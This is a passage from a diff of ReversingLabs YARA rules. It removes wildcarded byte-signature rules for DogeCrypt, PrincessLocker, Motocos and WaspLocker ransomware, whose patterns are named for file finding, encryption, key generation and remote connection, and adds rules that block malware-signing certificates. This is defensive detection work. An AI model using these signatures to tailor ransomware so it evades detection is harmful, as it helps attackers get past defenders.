?? ?? ?? ?? FF D6 57 - FF D6 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 52 51 E8 - ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 33 C0 66 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? - ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 - C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 - 5D C3 - } - $find_files_DogeCrypt = { - 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41 - F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ?? - ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF - 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B - CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B - 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF - 57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 - C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 - ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA - ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB - 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56 - 1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? - 83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? - ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15 - ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 - C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? - 80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 - E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 - 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 - } - $decrypt_DesucryptKeyContainer_DogeCrypt = { - 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? 8D 55 ?? 83 7D ?? ?? 8B 5D ?? 8B 35 ?? ?? ?? ?? 0F 43 D3 A1 ?? ?? ?? ?? 8B - 4D ?? 2B C6 89 75 ?? 3B C8 77 ?? 83 3D ?? ?? ?? ?? ?? 8D 3C 31 8D 04 09 89 3D ?? ?? - ?? ?? 50 8B 45 ?? BE ?? ?? ?? ?? 0F 43 35 ?? ?? ?? ?? 52 8D 04 46 50 E8 ?? ?? ?? ?? - 83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 52 C6 45 ?? ?? FF 75 ?? 51 B9 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ?? ?? ?? - 8B C3 81 F9 ?? ?? ?? ?? 72 ?? 8B 5B ?? 83 C1 ?? 2B C3 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? - ?? ?? 51 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 0F 43 - 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? - 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? 68 ?? ?? - ?? ?? 56 FF D3 83 F8 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 50 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 8D 45 ?? 6A ?? - 50 C6 07 ?? FF 35 ?? ?? ?? ?? 57 56 FF D3 83 F8 ?? 75 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? - ?? ?? 57 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? BA ?? ?? ?? ?? B9 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? - ?? ?? EB ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? - ?? ?? 8B E5 5D C3 E8 ?? ?? ?? ?? E8 - } - condition: - uint16(0)==0x5A4D and ($decrypt_DesucryptKeyContainer_DogeCrypt) and ($find_files_DogeCrypt) and ( all of ($encrypt_files_DogeCrypt_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="05:05:4f:de:a3:56:f3:dd:7d:b4:79:fa" and 1474436511<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Princesslocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_08Aaa069E92517F21Ce67Ca713F6Ea63 : INFO FILE { meta: - description = "Yara rule that detects PrincessLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b76ef137-aa0b-5fd3-9876-2459cb6535ff" - date = "2020-07-15" - modified = "2020-07-15" + id = "d468530e-8a51-583e-a108-e409f0144165" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.PrincessLocker.yara#L1-L92" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5be4ca3bd0b0afed1d2f3a59e2951d74a8de94c5a4d5a2c6cc29add49eab9ec0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14858-L14874" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "28ad7e9c75a701425003cde4a7eb10fa471394628cd5004412778d8d7cddb50b" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "PrincessLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files = { - 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? - ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 - ?? 50 53 FF D7 6A ?? FF B5 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? - FF B5 ?? ?? ?? ?? FF D6 85 C0 75 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 - ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 85 C0 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? - 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 53 FF D7 68 ?? ?? ?? - ?? 8D 4D ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 89 9D ?? ?? ?? ?? 85 DB 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D - 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? A1 ?? ?? - ?? ?? 8B 30 89 B5 ?? ?? ?? ?? 3B F0 0F 84 ?? ?? ?? ?? 33 C9 C6 45 ?? ?? 6A ?? 51 8D - 46 ?? 66 89 8D ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? - ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ?? - 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 FF 75 ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? C6 45 ?? ?? 8B CC - 33 C0 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 50 66 89 01 8D 85 ?? ?? ?? ?? - 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? - C3 C7 45 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? - E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 - C4 ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 - 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? - 68 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D BD ?? ?? - ?? ?? 6A ?? 6A ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 83 BD - ?? ?? ?? ?? ?? 6A ?? 0F 43 BD ?? ?? ?? ?? 6A ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 - 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? - ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 8B F8 83 FF - ?? 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? - ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 85 - ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 48 39 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? - 0F B6 C9 0F 46 C8 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 0F B6 C1 6A ?? 50 6A ?? FF - B5 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5 - ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 FF 15 - } - $remote_connection_1 = { - 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 84 DB 0F 85 ?? ?? ?? - ?? 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? C7 45 ?? ?? - ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? - ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? BA ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8B F0 8D 55 ?? C6 45 ?? ?? 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 56 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 - } - $remote_connection_2 = { - BA ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 66 C7 45 ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 55 ?? C6 45 - ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 BA ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 - 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 8B D0 C6 45 ?? ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 53 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? - ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 50 E8 - } - condition: - uint16(0)==0x5A4D and $encrypt_files and $remote_connection_1 and $remote_connection_2 + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "pioneersoft" and pe.signatures[i].serial=="08:aa:a0:69:e9:25:17:f2:1c:e6:7c:a7:13:f6:ea:63" and 1368403200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Motocos : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_1B7B54E0Dd4D7E45A0B46834De52658D : INFO FILE { meta: - description = "Yara rule that detects Motocos ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "cda44b86-c747-5b48-acd8-e68311ab24a3" - date = "2021-09-17" - modified = "2021-09-17" + id = "376da749-3cd4-5e37-b1ee-013e839f98ce" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Motocos.yara#L1-L75" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "34b99847f029a291808f08ba6e6ae62a54e6fed5acc928fe4828054801786881" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14876-L14892" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5febbce8c39440bfc4846f509f0b1dd4f71a8b4dc24fa18afb561d26e53c2446" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Motocos" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $generate_key = { - 55 8B EC 83 C4 ?? 53 89 4D ?? 89 55 ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? - ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 15 - ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 75 ?? B9 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 89 45 ?? 33 D2 55 68 ?? ?? - ?? ?? 64 FF 32 64 89 22 8B 4D ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ?? 89 45 ?? 33 D2 55 68 - ?? ?? ?? ?? 64 FF 32 64 89 22 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 8B D8 89 5D ?? 80 - 7D ?? ?? 75 ?? 8B 5D ?? 03 DB 53 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 83 C4 ?? 53 8D 45 ?? 50 8B 45 ?? 50 6A ?? 80 7D ?? ?? F5 1B C0 50 6A ?? 8B 45 - ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0 40 84 C0 75 ?? B9 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? - ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B 55 ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 - 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? - 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? C3 E9 ?? ?? - ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? - 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5B 8B E5 5D C2 - } - $encrypt_files = { - 55 8B EC 83 C4 ?? 53 56 57 33 C9 89 4D ?? 89 4D ?? 89 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? - 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 C6 45 ?? ?? 33 D2 55 68 ?? ?? ?? ?? 64 FF - 32 64 89 22 B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B D8 8B C3 8B D8 F6 C3 ?? 74 ?? 66 83 E3 ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B C3 - E8 ?? ?? ?? ?? 8B D0 B1 ?? 8B 45 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B 4D ?? B2 ?? A1 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 D2 - 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8B 45 ?? 8B 10 FF 12 8B C8 8B 55 ?? A1 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B C8 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 88 45 ?? 33 C0 5A 59 59 64 - 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? - ?? EB ?? 80 7D ?? ?? 75 ?? 8D 45 ?? 50 8B 45 ?? 89 45 ?? C6 45 ?? ?? B8 ?? ?? ?? ?? - 89 45 ?? C6 45 ?? ?? 8D 55 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? - E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0 40 88 45 - ?? 33 C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? E9 - } - $find_files = { - 55 8B EC 83 C4 ?? 53 56 57 33 C9 89 4D ?? 8B FA 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 - FF 30 64 89 20 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 85 DB 7C ?? 8B 45 ?? 66 - 83 3C 58 ?? 75 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? E8 ?? ?? ?? ?? - 8B 75 ?? 85 F6 74 ?? 83 EE ?? 8B 36 8D 45 ?? 50 8D 53 ?? 8B CE 8B 45 ?? E8 ?? ?? ?? - ?? 8B C7 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 - ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B C7 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 - ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 59 59 5D C3 - } - condition: - uint16(0)==0x5A4D and ($generate_key) and ($find_files) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="1b:7b:54:e0:dd:4d:7e:45:a0:b4:68:34:de:52:65:8d" and 1476662400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Wasplocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_B63E4299D0B0E2Dcdaeb976167A23235 : INFO FILE { meta: - description = "Yara rule that detects WaspLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "596bf965-700a-58f5-b0e5-61ec57c23a3e" - date = "2022-06-28" - modified = "2022-06-28" + id = "44af31cc-e0c9-5f3f-9645-a0453bc81e62" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.WaspLocker.yara#L1-L76" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "852ec52328fca36d651e3176ac33a57ce26cefecadc2aad27235548e5b9813c1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14894-L14912" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "da7415d0bc0245dea6a4ec325da5140c79c723c20fb7c04ff14f59a3089a5c88" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "WaspLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 50 50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? 51 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0 - 75 ?? 57 53 E8 ?? ?? ?? ?? 8D 4E ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - A8 ?? 75 ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 50 FF 15 - ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 3B 85 ?? ?? ?? ?? 76 ?? 8D 85 ?? ?? ?? ?? - 50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 59 03 C2 B9 ?? ?? ?? ?? 3B C1 - 7D ?? 8D 85 ?? ?? ?? ?? 2B CA 50 51 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 